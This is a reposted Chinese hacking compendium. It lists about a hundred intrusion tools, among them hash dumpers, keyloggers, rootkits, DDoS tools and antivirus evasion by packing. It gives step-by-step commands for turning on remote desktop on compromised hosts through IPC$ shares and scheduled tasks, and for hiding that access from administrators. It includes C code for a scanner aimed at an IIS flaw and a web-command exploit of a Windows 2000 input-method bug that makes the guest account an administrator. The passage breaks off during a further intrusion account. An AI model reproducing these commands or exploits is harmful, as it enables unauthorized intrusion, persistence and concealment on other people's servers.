途观自燃 大众老总:黑客基础知识大全1

来源:百度文库 编辑:偶看新闻 时间:2024/10/05 15:31:44
黑客基础知识大全1119款经典黑客小工具使用
webadv 针对iis+sp3的溢出成功率很高(溢出后system权限!) * 
ipscan 大范围网段快速ipc$猜解 
svc 远程安装/删除win2k服务 
3389.vbs 远程安装win2k终端服务不需i386 
arpsniffer arp环境sniffer(需要winpcap2.1以上) * 
ascii 查询字符和数字ascii码(常用来对url编码用以躲避ids或脚本过滤) 
ca 远程克隆账号 
cca 检查是否有克隆账号 
cgi-backdoor 几个cgi木马(十多种利用最新漏洞的web脚本后门,涵盖jsp,php,asp,cgi等等) * 
crackvnc 远程/本地破解winvnc密码(本地破用-W参数) 
pass.dic 密码字典 
debploit win2k+sp2配置最佳权限提升工具 
fpipe 端口重定向工具 
fscan superscan命令行版本(可定义扫描时的源端口并支持udp端口扫描) * 
hgod04 ddos攻击器 
idahack ida溢出 
idq.dll 利用isapi漏洞提升权限(对sp0+sp1+sp2都非常有效,也是很棒的web后门) 
IIS idq溢出 
inst.zip 指定程序安装为win2k服务 * 
ip_mail.rar 发送主机动态IP的软件 * 
ipc.vbs 不依赖ipc$给远程主机开telnet 
ispc.exe idq.dll连接客户端 
Keyghost.zip 正版键盘记录器 
log.vbs 日志清除器(远程清除不依赖ipc$) 
md5.pl 论坛md5加密密码破解器 
msadc.pl winnt的msadc漏洞溢出器 * 
MsSqlHack mssql溢出程序1 
mysql-client mysql客户端 
Name.dic 最常用的中国人用户名(看看你常用的用户名在不在里面) 
PassSniffer 大小仅3kb的非交换机sniffer软件 * 
psexec 通过ipc管道直接登录主机 
pskill 杀进程高手:) 
pslist 列进程高手:) 
rar 命令行下的中文版winrar(功能相当全面) * 
reboot.vbs 远程重启主机的脚本 
sdemo.zip 巨好的屏幕拍摄的录像软件 
shed 远程查找win9x的共享资源 
sid 用sid列用户名 
SkServerGUI snake多重代理软件 
SkSockServer snake代理程序 
SMBCrack 超快的ipc破解软件(适合破一台机) 
socks 利用这工具安装木马,即使网关重新低格硬盘木马也在嘿嘿 * 
SocksCap 把socks5代理转化为万能代理 
SPC.zip 可以直接显示出远程win98共享资源密码的东东 * 
WMIhack 基于WMI服务进行账号密码的东东(不需要ipc) 
skmontor snake的注册表监视器(特酷的) 
sql1.exe mssql溢出程序2 
sql2.exe mssql溢出程序3 
SqlExec mssql客户端 
SuperScan GUI界面的优秀扫描器 
syn syn攻击第一高手 
upx120 特好的压缩软件,常用来压缩木马躲避杀毒软件 
wget 命令行下的http下载软件 
Win2kPass2 win2k的密码大盗 
Winnuke 攻击rpc服务的软件(win2ksp0/1/2/3+winnt+winxp系统不稳定) 
smbnuke 攻击netbios的软件(win2ksp0/1/2/3+winnt+winxp系统死机) 
WinPcap_2_3 nmap,arpsniffer等等都要用这个 
WinPcap_2_3_nogui.exe 无安装界面自动安装的WinPcap_2_3(命令行版) * 
scanbaby2.0 能对80%的mail服务利用漏洞列账号密码破解(超酷哦,去看rfc里有mail弱点说明) * 
SuperDic_V31 非常全面的黑客字典生成器 
Getadmin win2k+sp3配置的权限提升程序(不错!!!) * 
whoami 了理自己的权限 
FsSniffer 巨好的非交换机sniffer工具 
twwwscan 命令行下巨好的cgi扫描器 
TFTPD32 给远方开tftp服务的主机传文件(当然要有个shell) 
RangeScan 自定义cgi漏洞的GUI扫描器 
pwdump2 本地抓winnt/2k密码散列值(不可缺) 
pwdump3 远程抓winnt/2k密码散列值(不可缺) 
procexpnt 查看系统进程与端口关联(GUI界面) * 
nc 已经不是简单的telnet客户端了 
CMD.txt 有什么cmd命令不懂就查查它 * 
fport 命令行下查看系统进程与端口关联(没有GUI界面的procexpnt强) 
BrutusA2 全功能的密码破解软件,支持telnet,ftp,http等服务的口令破解 
cmd.reg 文件名自动补全的reg文件(命令行:按TAB键自动把sys补全为system,再按一次就变为system32) 
regshell 命令行下的注册表编辑器 
nscopy 备份员工具(当你是Backup Operators组的用户时有时你的权限会比admin还大) 
session.rar 有了win/nt2000目标主机的密码散列值,就可以直接发送散列值给主机而登录主机 * 
klogger.exe 一个几kb的击键记录工具,运行后会在当前目录生成KLOGGER.TXT文件 * 
smb2 发动smb的中间人MITM攻击的工具,在session中插入自己的执行命令 * 
xptsc.rar winxp的远程终端客户端(支持win2000/xp) 
SQLhack.zip 相当快的mssql密码暴力破解器 
mssql 相当快的mssql密码暴力破解器 
ntcrack.zip 利用获取到的MD4 passwd hash破解帐号密码 
SQLSniffer.rar MSsql的密码明文嗅探器 
TelnetHack.rar 在拥有管理员权限的条件下,远程打开WIN2000机器的Telnet服务 
RFPortXP.exe XP下关联端口与进程的程序 
SQLTools.rar mssql工具包 
ServiceApp.exe 远程安装/删除服务 
hgod 具有SYN/DrDos/UDP/ICMP/IGMP拒绝服务测试功能的选项 
hscan 小型综合扫描器(支持cisco,mysql,mssql,cgi,rpc,ipc(sid),ftp,ssh,smtp等等相当全面) 
HDoor.rar ping后门(icmp后门) 
SIDUserEnum.exe 利用sid得到用户列表(小榕的那个sid有时不能完全列举出来) * 
RPC_LE.exe 利用rpc溢出使win2k重启(对sp3+sp4hotfix有效) * 
r3389.exe 查询Terminal Server更改后的端口(1秒内) * 
smbsniffer.exe 获取访问本地主机网页的主机散列值(支持截获内网主机散列) * 
NetEnum.exe 通过3389端口+空连接获取对方主机大量信息 * 
aspcode.exe 经测试最有效的asp溢出程序第二版(对sp2有效) 
sslproxy 针对使用ssl加密协议的代理(扫描器通过它就可以扫描ssl主机了!!!!) * 
lsa2 在lsa注册表键里获取winnt/2k的明文密码包括sqlserver的(打了补丁就没用了) * 
psu.exe 用指定进程的权限打开指定的程序 
ldap.msi ldap 轻量级目录服务客户端,通过389端口获取主机大量信息如账号列表 * 
rootkit 从系统底层完美隐藏指定进程,服务,注册表鍵并可以端口绑定的内核级win2k后门!!! * 
后记: 
在我做安全检测和渗透入侵的时候,这些工具都帮了我不小的忙(当然还有一些大工具如ISS、SSS、X-SCAN)。当然,有时候扫描不出漏洞时就要靠自己去分析安全隐患了,这样的例子不少,比如我对一些网站成功地渗透入侵的事例其中就是利用了大量的脚本和sql知识(只能利用80端口并且xp_cmdshell等几十个扩展存储都不可恢复)以及对安全模型的理解,而工具派不上任何用场。所以我有一条安全检测准则:%10的工具灵活应用+%30经验技术+%60的分析=一次较有深度的安全检测.
【3389】 3389 在漏洞不段出现的今天,入侵一台服务器已经不是什么新鲜事,但凡是入侵成功之后,都想尽办法来打开终端服务,什么是终端呢?又怎么在远程打开呢?看完本文,你就会成为一个开“终端的高手”。
文:终端服务全攻略 作者:dahubaobao主页:http://www.ringz.org 邮件:dahushibaobao@vip.sina.com QQ:382690发表于黑客防线2004年1期工具及图片都在压缩包中,解压密码:www.ringz.org http://dahubaobao.go.nease.net/Terminating.rar 欢迎进入环形区,一群技术狂热者的社区,www.ringz.org欢迎你的加入!=====================================================================终端服务全攻略
在漏洞不段出现的今天,入侵一台服务器已经不是什么新鲜事,但凡是入侵成功之后,都想尽办法来打开终端服务,什么是终端呢?又怎么在远程打开呢?看完本文,你就会成为一个开“终端的高手”。
什么是终端服务3389又称Terminal Service,服务终端。在WindowsNT中最先开始使用的一种终端,在Win2K的Professional版本中不可以安装,在Server或以上版本才可以安装这个服务,其服务端口为3389。由于使用简单,方便等特点,一直受系统管理员的青昧。也正式因为他的简便,不产生交互式登陆,可以在后台操作,因此也受到了黑客朋友的喜爱,事实可以说明,现在大多数朋友在入侵之后,都想打开windows终端服务,甚至不惜重启对方的计算机,也要把终端服务安装上,由此可见他的普遍性。另,在在XP系统中又叫做“远程桌面”。
打开终端服务的各种方法下面进入正题,开始今天的“终端”之旅。(各种工具我会提供)一, 使用ROTS.VBS脚本插拨广告:1, 什么是VBSVBScript的全称是:Microsoft Visual Basic Script Editon.(微软公司可视化BASIC脚本版). 正如其字面所透露的信息, VBS(VBScript的进一步简写)是基于Visual Basic的脚本语言. 我进一步解释一下, Microsoft Visual Basic是微软公司出品的一套可视化编程工具, 语法基于Basic. 脚本语言, 就是不编译成二进制文件, 直接由宿主(host)解释源代码并执行, 简单点说就是你写的程序不需要编译成.exe, 而是直接给用户发送.vbs的源程序, 用户就能执行了。
知道什么是VBS了,下面开始进行测试。首先你要获得这台主机的Administrator权限或Local System权限,具体怎么获得在这不必讨论。先来看看ROTS.VBS帮助.。(见图1)ROTS v1.01Remote Open Terminal services Script, by zzzEVAzzzWelcome to visite www.isgrey.com Usage:cscript c:\scriptpath\ROTS.vbs targetIP username password [port] [/r]port: default number is 3389./r: auto reboot target.
一般的命令格式:ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]。
下面打开本地CMD,输入:ROTS.vbs XXX.XXX.XX.XXX dahubaobao dahu 3389 /fr
注意:1,/fr为强制重启,/r为普通重启,不要搞混了。2, 脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。
优点:成功率高。缺点:必须重新启动。二,使用批处理(bat)open3389.bat,先来看看帮助:(见图2)*******************Open3389*********************使用方法:open3389.bat ip user passwordopen3389.bat 目标ip 用户名 密码还是打开CMD,输入:open3389.bat XXX.XXX.XX.XXX dahubaobao dahu
好了 就这样来打开3389,bat文件真的很好用,建议大家去学习。
优点:不必重新启动。缺点:成功率不高。
三, 使用HBULOT这个工具要上传到对方的机器,然后执行,比较麻烦。C:\>net use \\XXX.XXX.XX.XXX\IPC$ "dahu" /user:"dahubaobao" //建立IPC连接C:\>copy HBULOT.exe \\ XXX.XXX.XX.XXX \WINNT\admin$ //上传到对方的systeme32目录下。C:\>net use \\XXX.XXX.XX.XXX\IPC$ /del //断开IPC
然后telent过去,到对方的WINNT\systeme32目录下,直接运行HBULOT.exe即可(见图3)。 ---------------------------------------------------------------------------------------------------------------
下面介绍的不需要工具,具体请看我的方法首先telent过去,然后输入query user,使用这个命令的前提是安装终端,如果出现如图4的情况,就表明安装了终端。如果没有,那就证明没有安装,请看我是怎么做的:
C:\> dir c:\sysoc.inf /s //查找sysoc.inf文件的位置 c:\WINNT\inf 的目录
2003-06-19 12:05 3,458 sysoc.inf1 个文件 3,458 字节
C:\>dir c:\sysocmgr.* /s //查找组件安装程序c:\WINNT\system32 的目录
1900-10-29 04:00 42,768 sysocmgr.exe1 个文件 42,768 字节
C:\>echo [Components] > c:\ts C:\>echo TSEnable = on >> c:\ts//建立无人职守安装的参数C:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\ts /q开启3389,并且重新启动,如果C:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\ts /q /r开启3389,不重新启动。
如果重新启动,那等几分钟就可以用客户端连接了,如果没重新启动,那就要等对方重新启动之后,才能连接(看你的耐心喽)。----------------------------------------------------------------------------------

在介绍一种很方便的做法,就是做一个bat文件,在本地运行即可,下面是bat的内容echo [Components] > c:\ts
echo TSEnable = on >> c:\ts
C:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\ts /q
net use \\ip\ipc$ dahu /user:dahubaobao
copy 路径:\xxx.bat \\ip\winnt\admin$
at time 00:00:00 xxx.bat
主机执行之后,会自动重启,之后就可以利用3389登陆了。
这个bat文件很容易,前两条语句是“建立无人职守安装的参数”,第三条是真正的“开启终端的命令”,第四条是“IPC连接”,第五是“把bat文件copy到对方的winnt\system32目录下”,最后是用“time获取时间,然后用at命令启动。”
(个人推荐这种方法,比较简单,有点IPC知识的就可以实现。)

修改终端服务端口这一步很重要,我们辛苦的开启了终端服务,不能因为“3389”的暴露而前功尽弃,所以端口是必须修改的,先说一下原理,终端服务安装完成后,会在注册表中增加两个键,其键值分别为16进制的3389,即“0x00000D3D”。现在打开“运行”,输入“regedit”启动注册表编辑器,然后打开HKEY-LOCAL_MACHINE\System\CurrentControlSet\Control\TerminalServer\Wds\Repwd\Tds\Tcp和HKEY-LOCAL_MACHINE\System\CurrentControlSet\Control\TerminalServer\WinStartions\RDP-TCP子键,修改“PortNumber”,假如我们修改成8080端口,其键值为“1F90”,保存退出,注意,重启之后才能生效,修改完成之后,会到本地,打开客户端,输入:XXX.XXX.XXX.XX:8080,就可以连接了。(见图5,6)
有的朋友对注册表不熟悉,更有甚者恐惧注册表,认为是很难驾御的地方,那好办,下面介绍一个小工具,可以在命令行下修改端口,看我是怎么做的:还是先来看帮助=======================================================Change Local or Remote TermService Port ProgramCode By wawa@21cn.Com Http://www.Haowawa.Com =======================================================Local Usage: c3389 7358Remote Usage: c3389 \\192.168.0.1 adminname password 7358
Local Host TermService Port is : 3389
本地修改:c3389 端口远程修改:c3389 \\XXX.XXX.XXX.XX Admin用户 密码 端口
先来看本地修改:打开CMD。输入c3389 post,具体见图7。
在来看远程修改:输入c3389 \\XXX.XXX.XXX.XX adminname password post。
到这里,端口就修改关闭了。
隐藏上次登陆过的用户名在终端安装完成后,并且你已经登陆过,那么再次登陆就会显示上次登陆过的用户名,如果我们添加的帐户(或克隆)被管理员看到了,那不起疑心才怪呢?所以我们要隐藏登陆过的用户,要实现隐藏,还是要修改注册表,具体看我怎么做:在“运行”中输入“regedit”启动注册表编辑器,依次展开:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon子键下的DontDisplayLastUserName,默认键值为“0”,我们修改为“1”,保存,退出,重新启动之后生效。见图8

限制/指定连接终端的地址现在我们已经给肉鸡看了终端,并且修改了端口,还做了一些简单的维护,但这还是不够的,假如某人知道了我们修改过的端口就是终端服务,那就挂了,所以还要在肉鸡上通过IPSEC这个系统自带的而且功能非常强大的工具来做一下限制,具体请看我的演示:
1,静态IP假如我的IP是111.222.255.255,我们通过设置IPSEC,来让肉鸡上的终端只通过我的连接,而拒绝除了我以外的所有连接,好,就这么办,先登陆终端,然后打开“管理工具”—“本地安全设置”,设置如下:
首先右键点击“IP安全策略 在本地机器”选择“创建IP策略”,然后打开了一个向导,即“IP安全策略向导”—“下一步”—“名称”—“下一步”取消“激活默认响应规则”—“下一步”—“完成”,这是会重新打开一个“新IP安全策略 属性”(见图9),取消“使用“添加向导””—“添加”—出现“新规则属性”—“添加”—出现“IP筛选器列表”—取消“使用“添加向导””—“添加”—出现“筛选器 属性”,选择“寻址”标签,源地址设为‘任何IP地址’,目的地址设为‘我的IP地址’;在选择“协议”标签,选择协议类型设为‘TCP’,设置IP协议端口‘从任意端口’—‘到此端口8080’—“确定”(见图10,11)--“关闭”—回到“新规则 属性”—选择“新IP筛选器列表”—在选“筛选器操作”标签—取消“使用“添加向导””—“添加”—在“安全措施”标签下选择“阻止”—“确定”—“关闭”(见图12),回到“新规则 属性”—选中“新筛选器操作”—“关闭”—“关闭”—回到“本地安全设置”—选中“新IP安全策略”—右键点击“指派”(见图13),好了,总算设置完了,这样所有的机器就无法连接8080(终端)端口了。
注意:以上都是使用默认的名称,所以大家在设置的时候注意一下。
由于上边的设置,把我自己也挡在了外面,这可不是我所想要的,所以,我们还要建立一条规则,允许我的IP 111.222.255.255访问对方的8080端口,方法如下:
右键点击“新IP安全策略”—“属性”—不选“使用“添加向导””—出现“新规则 属性”—“添加”—出现“IP筛选器列表”—不选“使用“添加向导””—“添加”—出现“筛选器 属性”—选择“寻址”标签,设置成如图14的样子,在选择“协议”标签,设置成如图12的样子,然后“确定”—“关闭”—回到“新规则 属性”—选中“新IP筛选器列表(1)”—在选“筛选器操作”标签—在选“允许”—“关闭”—“关闭”—回到“本地安全设置”。(见图15)
2,动态IP
在中国,拥有静态IP的人毕竟是少数,大多数朋友还都是拨号,虽然现在ADSL很普遍,但ADSL还是虚拟拨号,即动态IP,所以用上边的方法设置IPSEC肯定是不行的,所以,现在我们要修改上边的一条规则,使IPSEC可以通过 特定子网的连接,方法很简单,其他的都不用改,按照图16的方法设置就可以了。


【3389肉鸡快捷键】CTRL+ALT+END 把“任务管理器”抓出来 CTRL+ALT+BREAK这个就是切换全屏显示。CTRL+ALT+END 打开“Windows 安全”对话框。 
ALT+PAGE UP 从左向右在程序之间切换。 
ALT+PAGE DOWN 从右向左在程序之间切换。 
ALT+INSERT 按启动顺序来回切换程序。 
ALT+HOME 显示“开始”菜单。 
CTRL+ALT+BREAK 在窗口(如果适用)和全屏显示之间切换客户端。 
ALT+DELETE 显示窗口的弹出式菜单。 
CTRL+ALT+减号 (-) 将客户端活动窗口的快照放在“终端”服务器的剪贴板上(与在本地计算机上按下 ALT+PrintScrn 键时的功能相同)。 
CTRL+ALT+加号 (+) 将整个客户端窗口区域的快照放在“终端”服务器的剪贴板上(与在本地计算机上按下 PrintScrn 键时的功能相同)。 
注意: 
在NEC98 计算机中,这些快捷键在以下两种情况下会有些不同: 
CTRL+ALT+BREAK由 F12 键代替。 CTRL+ALT+END 由 F15 键代替。 



【80端口、512端口、3389端口……入侵实例】80端口、512端口、3389端口……入侵实例 
(2004-04-09 17:16)  有很多网站为了安全起见,在WEB Server前面架了防火墙,或者做了TCP/IP过滤,对外只开放TCP 80端口。从入侵者角度来看,要入侵那么从80上跑的CGI入手是比较可行的,当然也可以用别的办法,例如旁敲侧击,呵呵。从网管角度来看,一是要保证CGI的安全性,另外网络的整体安全性也是很重要的。针对基于80端口入侵、防范而出的CGI扫描器数不胜数,但基本上原理都一样。   CGI扫描器原理说起来其实非常简单,可以用四句话来概括:<1>连接目标WEB SERVER;<2>发送一个特殊的请求;<3>接收目标服务器返回数据;<4>根据返回数据判断目标服务器是否有此CGI漏洞。   当管理的服务器达到一定数量的时候,手工检测自己的服务器是否存在各种各样的CGI漏洞,那就太消耗时间和精力了,所以一个网管手上有个比较好用的CGI漏洞扫描器还是必要的。OK!今天我们就自己来动手用C写一个简单的CGI扫描器,帮助自己在日常工作中检测服务器:))   源代码如下,很多地方我都加了注释,别嫌我烦哦:))编译好的程序可以从http://eyas.3322.net/program/cgicheck.exe下载。   /************************************************************************* Module:CGICheck.cpp Author:ey4s Date:2001/5/16说明:这是一个Console下多线程,带有进度显示的CGI扫描器的模板,更改一下szSign和SendBuff就可以扫描其他CGI漏洞,设置了连接、发送、接收超时,速度还可以哦。希望可以帮助到admins检测自己的服务器:))   *************************************************************************/ #include                     #define iPort 80//目标Web Server端口#define szSign “500 13\r\nServer: Microsoft-IIS/5.0”//根据此标志来检查目标是否有漏洞                     #pragma comment(lib,“ws2_32.lib”)   /////////////////////////////////////////////////////////////////////////// // //定义&初始化全局变量// char *SendBuff=“GET /NULL.printer\n”,//发送的请求buff CurrentTarget[52]=,//存放最后一个线程将扫描的目标turn[4][2]=;//显示进度时的字符int SendBuffLen=strlen(SendBuff),//发送的buff长度iConnTimeout,//TCP Connect TimeOut ii=0,//扫描进度iTotal;//服务器总数HANDLE hSemaphore=NULL,//信标内核对象句柄,用来控制线程数量hStdout;//console标准输出句柄,做进度显示的时候用的struct timeval timeout;//连接、发送和接收的超时值DWORD SleepTime;//每个一个线程后等待的时间/* SleepTime值根据用户输入的线程数量[ThreadNum]和TCP ConnectTimeOut[CONNTIMEO]来计算。确保在CONNTIMEO时间左右开ThreadNum个线程。这样在CONNTIMEO时间后,所开的线程开始陆续超时退出,可以继续稳定的开线程,可以有效的保证同时有ThreadNum个线程在运行。   */ /////////////////////////////////////////////////////////////////////////// void ShowError(char *);//显示出错信息函数,可以写完善一些,偶偷懒了:)   BOOL ResetCursor(void);//重置光标位置,线程输出的时候调用的DWORD WINAPI ShowProInfo(LPVOID);//显示进度信息DWORD WINAPI scan(LPVOID);//扫描函数void usage(char *);//帮助函数/////////////////////////////////////////////////////////////////////////// int main(int argc,char **argv)   { HANDLE hThread=NULL;//线程句柄DWORD dwThreadID;//线程ID struct sockaddr_in sa;int i,MaxThread;//最大线程数量WSADATA wsd;long PreviousCount;clock_t start,end;//程序运行的起始和结束时间double duration;                     //检查用户输入参数if(argc!=5)   { usage(argv[0]);return 1;} //get target range int StartNet=inet_addr(argv[1]);int StopNet=inet_addr(argv[2]);int StartHost=ntohl(StartNet);int StopHost=ntohl(StopNet);//取得线程数量MaxThread=atoi(argv[3]);//取得conn超时时间iConnTimeout=atoi(argv[4]);//检查参数合法性if((iConnTimeout>6) || (iConnTimeout<2) || (MaxThread<1) || (MaxThread>500) ||(StopHost { usage(argv[0]);return 1;} //计算时间SleepTime=1000*iConnTimeout/MaxThread;//设置连接超时值timeout.tv_sec = iConnTimeout;timeout.tv_usec =0;__try { //开始计时start=clock();//加载winsock库if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)   { ShowError(“WSAStartup”);__leave;} //创建信标内核对象句柄hSemaphore=CreateSemaphore(NULL,MaxThread,MaxThread,NULL);if(hSemaphore==NULL)   { ShowError(“CreateSemaphore”);__leave;} //取得console标准输出句柄hStdout=GetStdHandle(STD_OUTPUT_HANDLE);if(hStdout==INVALID_HANDLE_value)   { ShowError(“GetStdHandle”);__leave;} //设置目标总数iTotal=StopHost-StartHost;//创建进度显示线程hThread=CreateThread(NULL,0,ShowProInfo,NULL,0,&dwThreadID);if(hThread==NULL)   { ShowError(“1 CreateThread”);__leave;} //关闭句柄CloseHandle(hThread);//循环创建扫描线程for(i=StartHost;i<=StopHost;i++)   { //等待信标内核对象通知WaitForSingleObject(hSemaphore,INFINITE);//create thread to scan hThread=CreateThread(NULL,0,scan,(LPVOID)i,0,&dwThreadID);if(hThread==NULL)   { ShowError(“2 CreateThread”);break;} //进度自加1 ii++;//重设最后一个线程扫描的目标sa.sin_addr.s_addr=htonl(i);strncpy(CurrentTarget,inet_ntoa(sa.sin_addr),sizeof(CurrentTarget));//休息一会儿)   Sleep(SleepTime);//关闭线程句柄CloseHandle(hThread);} //等待所有线程结束while(1)   { WaitForSingleObject(hSemaphore,INFINITE);if(!ReleaseSemaphore(hSemaphore,1,&PreviousCount))   { ShowError(“main() ReleaseSemaphore”);Sleep(5000);break;} if(PreviousCount==(MaxThread-1))   { printf(“\nAll done.”);break;} Sleep(500);} }//end of try //搞定,清场,收工__finally { //计时结束end=clock();//转换时间格式duration = (double)(end - start) / CLOCKS_PER_SEC;//显示所用时间printf(“\n\nComplete.Scan %d targets use %2.1f seconds.Speed %0.3g/s\n”,iTotal,duration,iTotal/duration);//关闭句柄CloseHandle(hStdout);CloseHandle(hSemaphore);WSACleanup();} return 0;} /////////////////////////////////////////////////////////////////////////// // //回显错误信息函数// void ShowError(char *msg)   { MessageBox(NULL,msg,“ERROR”,0);//printf(“\n%s failed:%d”,GetLastError());} ////////////////////////////////////////////////////////////////////////// // //重置光标位置函数,以便扫描线程输出结果// BOOL ResetCursor()   { CONSOLE_SCREEN_BUFFER_INFO ConsoleScreenBufferInfo;//取得当前光标位置if(!GetConsoleScreenBufferInfo(hStdout,&ConsoleScreenBufferInfo))   { ShowError(“GetConsoleScreenBufferInfo”);return FALSE;} //设置光标X坐标为0 ConsoleScreenBufferInfo.dwCursorPosition.X=0;//设置当前光标位置SetConsoleCursorPosition(hStdout,ConsoleScreenBufferInfo.dwCursorPosition);return TRUE;} /////////////////////////////////////////////////////////////////////////// // //显示进度信息函数// DWORD WINAPI ShowProInfo(LPVOID lp)   { int j,k;CONSOLE_SCREEN_BUFFER_INFO ConsoleScreenBufferInfo;float m;for(j=0;ii { //休息一会儿))   Sleep(SleepTime);//取得当前光标位置if(!GetConsoleScreenBufferInfo(hStdout,&ConsoleScreenBufferInfo))   { ShowError(“GetConsoleScreenBufferInfo”);return 1;} //设置百分比进度显示的X坐标ConsoleScreenBufferInfo.dwCursorPosition.X=0;//设置当前光标位置SetConsoleCursorPosition(hStdout,ConsoleScreenBufferInfo.dwCursorPosition);//已经完成的百分比m=(ii+1)*100.00/iTotal;//显示进度if(ii==iTotal)   { printf(“******** 100%% Wait %d seconds to exit ******** \n",iConnTimeout); 
  break;} else { k=j%4;printf(“%-15s %s [%d/%d] %s %%%0.3g”,CurrentTarget,turn[k],ii,iTotal,turn[k],m);} }//end of for return 0;} /////////////////////////////////////////////////////////////////////////// // //扫描函数// DWORD WINAPI scan(LPVOID lp)   { int i=(int)lp,iErr;struct sockaddr_in server;SOCKET s=INVALID_SOCKET;char RecvBuff[1024]=,*ptr;int RecvBuffLen=sizeof(RecvBuff);u_long ul=1;//初始化为为非0值fd_set r,w;                     //create socket s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);if(s==INVALID_SOCKET)   { printf(“\nCreate socket failed:%d”,GetLastError());ExitProcess(1);} //fill the addr struct server.sin_family=AF_INET;server.sin_port=htons(iPort);server.sin_addr.S_un.S_addr=htonl(i);__try { //设置socket为非锁定模式,ul为0值的话,那么soocket将被设置为锁定模式iErr=ioctlsocket(s,FIONBIO,(unsigned long*)&ul);if(iErr==SOCKET_ERROR )   { ResetCursor();ShowError(“ioctlsocket”);ExitProcess(1);} //printf(“\n%X ioctl ok.strat conn”,i);//connect to target connect(s,(struct sockaddr *)&server,sizeof(server));//printf(“\n%X conn return,start select w”,i);//设置select参数FD_ZERO(&w);FD_SET(s, &w);//等待connect成功&socket可写iErr=select(0, 0, &w, 0, &timeout);//printf(“\n%X select w return %d”,i,iErr);//等待返回后,socket仍不可写则退出if((iErr==SOCKET_ERROR) || (iErr==0))   { //printf(“\n%X select return w err,exit”,i);__leave;} //socket可写则继续else { //send buff to target //printf(“\n%X send”,i);iErr=send(s,SendBuff,SendBuffLen,0);//printf(“\n%X send return”,i);if(iErr==SOCKET_ERROR)   __leave;} //等待socket可读FD_ZERO(&r);FD_SET(s, &r);//printf(“\n%X start select r”,i);iErr=select(0, &r, 0, 0, &timeout);//printf(“\n%X select r return %d”,i,iErr);if((iErr==SOCKET_ERROR) || (iErr==0))   { //printf(“\n%X select r err,exit”,i);__leave;} else { //recv buff from target //printf(“\n%X start recv”,i);iErr=recv(s,RecvBuff,RecvBuffLen,0);//printf(“\n%X recv ret”,i);if(iErr==SOCKET_ERROR)   __leave;} //verify buff ptr=strstr(RecvBuff,szSign);if(ptr!=NULL)   { //线程输出前要先调用ResetCursor函数ResetCursor();//输出信息后务必加一个以上换行符号,输出前请别加换行符号,以免显示混乱printf(“[%-15s] has .printer mapped. \n",inet_ntoa(server.sin_addr)); 
  } __finally { if(!ReleaseSemaphore(hSemaphore,1,NULL))   ShowError(“thread ReleaseSemaphore failed”);closesocket(s);} return 0;} /////////////////////////////////////////////////////////////////////////// void usage(char *proname)   { printf(“\n%s v0.1 only can find IIS5 .Printer mapped”“\nPower by ey4s 2001.5.20”“\nhttp://www.patching.net”“\n\nUsage:%s ”“\n\nNotice”“\n StartIP StopIP ==>Don't forgot StopIP must large than StartIP ”“\n ThreadNum ==>Thread number,please input between 1-500”“\n CONNTIMEO ==>TCP connect timeout,please input between 2-6”“\n\nExample”“\n %s 192.168.0.0 192.168.255.255 200 2”,proname,proname,proname);}程序在VC++6.0上编译通过,在windows2000上运行良好:)                                                         389端口的入侵3389端口的入侵3389端口的入侵                     由于微软对中国产品不付责任的态度,使得安装了终端服务和全拼的w2k服务器存在着远程登陆并能获取超级用户权限的严重漏洞。   其过程如下:                     1.扫描3389 port终端服务默认;2.用终端客户端程序进行连接;3.按ctrl+shift调出全拼输入法(其他似乎不行),点鼠标右键(如果其帮助菜单发灰,就赶快赶下家吧,人家打补丁了),点帮助,点输入法入门;4.在“选项”菜单上点右键——>跳转到URL“,输入:c:\winnt\system32\cmd.exe.(如果不能确定NT系统目录,则输入:c:\或d:\……进行查找确定);5.选择”保存到磁盘“选择目录:c:\inetpub\scripts\,因实际上是对方服务器上文件自身的复制操作,所以这个过程很快就会完成;6.打开IE,输入:http://ip/scripts/cmd.exe?/c dir怎么样?有cmd.exe文件了吧?这我们就完成了第一步;7.http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat 8.http://ip/scripts/cmd.exe?/c echo net user guest elise》go.bat 9.http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest》go.bat 10.http://ip/scripts/cmd.exe?/c type go.bat看看我们的批文件内容是否如下:                     net user guest /active:yes net user guest elise net localgroup administrators /add guest 11.在“选项”菜单上点右键——>跳转到URL“,输入:c:\inetpub\scripts\go.bat ——>在磁盘当前位置执行;12.呵呵,大功告成啦,这样我们就激活了服务器的geust帐户,密码为:elise,超级用户呢!(我喜欢guest而不是建立新帐户,这样似乎不易被发现些),这样你就可用IPC$连接,想怎样做就怎样做了,当然,你也可用guest直接登陆到他的服务器,到他机器上去跳舞吧:-)                     注意事项:1.当你用终端客户端程序登陆到他的服务器时,你的所有操作不会在他的机器上反应出来,但如果他正打开了终端服务管理器,你就惨了了:(这时他能看到你所打开的进程id、程序映象,你的ip及机器名,并能发消息给你!   2.当你连接时,会加重对方服务器的负荷,非常容易造成对方死机和断线,所以你的操作快点为妙。   3.尽快做好后门,暂时不要上传任何程序,一是防止断线,二是防止对方打上补丁!   个人观点:1.在IE下,所拥有的只是iusr_machine权限,因而,你不要设想去做越权的事情,如启动telnet、木马等;2.url的跳转下,你将拥有超级用户的权限,好好利用吧3.跳转到哪个目录下,通常只能查看、执行当前目录的文件,不能进入到子目录,如想进入,再跳一次吧!:)   4.此法似乎与对方的防火墙无关哦!   5.据本人实际操作,发现极易断线,但应与占用服务器资源无关。对方是384M RAM+PIII,是静态IP,主要是做数据库服务器,RAID硬盘,SCSI CD ROM,开机18天了,02:00进去时,仍时常吊线。                     堵漏办法:1.打补丁;2.删掉全拼输入法,用标准就成了嘛^_^;3.服务中关掉:Terminal Services,服务名称:TermService,对应程序名:system32\termsrv.exe;                                       512端口入侵                     已经是第六十几天了,我的Celeron 533仍不知疲倦的跑着JOHN……我是无意中注意到这个网站的,当时只是想看一下,方法是各位大虾都会的FINGER,然后猜用户口令进去的。进去之后PASSWD也没有SHADOWN,直接就可以看到,该系统用的是Digital 